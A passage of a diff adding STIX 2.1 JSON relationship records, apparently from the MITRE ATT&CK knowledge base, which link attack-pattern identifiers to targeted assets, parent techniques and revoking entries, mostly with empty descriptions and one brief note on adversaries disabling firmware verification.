"targets", + "source_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c7f21bb-7f6c-4644-9abf-457c2208ccc2", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c846cd5-979c-4537-8bcb-295faab82c2e", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1c8ce5e2-3a80-407e-9624-3619528df5fa", + "created": "2020-03-15T16:16:25.878Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ca16861-8416-4880-848a-954ea148c24b", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ca95660-87c1-42f9-bb5d-7435f7999c88", + "created": "2020-01-30T19:59:18.946Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5", + "target_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ca9c48d-88cc-44b1-8124-e46076d6c9ae", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1caed160-05f8-4e76-be4f-34d111bcb977", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1cc0cdbd-99a1-42b8-83f3-b0738cd37e09", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1cc29825-a1d2-4ee9-a097-68690f1f064c", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ccf4b57-e3ac-4332-b209-20a5547090a5", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1cf89a8b-c0f6-4ffb-ae39-36e2a9d3b081", + "created": "2023-09-29T18:46:12.052Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:46:12.052Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d30cb68-7af5-4cd6-bbc6-fb9e819253c7", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d5a3946-2848-4dfc-89ad-6a43161531aa", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d5b9bf7-fe05-4031-a4ae-8581e91f6dcd", + "created": "2024-06-27T09:21:38.213Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:21:38.213Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d6fa472-a1fe-4657-a60d-c7f1c39b1653", + "created": "2023-09-29T17:40:22.705Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:40:22.705Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d71f004-597a-4383-9038-b54ebda8fbd6", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d79747d-3ff5-44ab-ae40-80823347c7d7", + "created": "2020-01-14T17:21:54.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1d8d5e09-c4bc-4ebd-a8d9-d27597604990", + "created": "2024-06-26T14:36:36.221Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:36:36.221Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1da40179-be3f-4223-8057-f5cd12f15530", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1df71ab4-5e39-49ec-93cf-df04e473cfdd", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e3c5355-283f-4d8f-900d-c8fa86174d7c", + "created": "2024-05-22T17:13:37.995Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T00:17:01.403Z", + "description": "Asset Mapping Rationale: Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.\n", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e3f3a41-d859-432d-8459-43d39542898b", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e407305-2a63-48ab-94fd-6aa927d15432", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e40e4f7-cedf-4c13-a894-981d8ab8c729", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e4f9ae7-5177-4e16-92b8-e1fc0a3e7d81", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e5a9b76-82c0-497f-91a6-7e6d816f8fa5", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e61e0b2-0bea-4dc8-97a2-fb5ab910d8ad", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e86ffd5-cf29-46ef-b697-7a6a0e0a5fee", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e950346-c2b5-4b79-a2a0-d0b1ed1a221b", + "created": "2022-09-27T18:02:16.150Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:02:16.150Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e98fd92-7c08-4aae-a448-497c6b1e568b", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1e9de205-eb65-4477-b43d-4dfaa95c405a", + "created": "2024-06-27T09:33:41.169Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:33:41.169Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1eb067c7-e741-46b6-9080-dbc8395f8c43", + "created": "2020-02-04T19:24:28.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "target_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1ed4be64-3251-4901-8fcc-cdf1b3d1ae88", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1eda3d56-cdc4-45b1-b42d-e8ee5a9c8f68", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f05888b-a489-43a0-bfe1-92f28ec64683", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f262330-4075-4fce-91b7-c3f0fd7a0739", + "created": "2020-10-20T00:08:21.787Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f370c88-078d-4c2c-bd4b-b9c385857ff2", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1f393d04-36db-4bae-a2a4-53ff12a1240e", + "created": "2023-09-28T21:12:25.345Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:12:25.345Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": 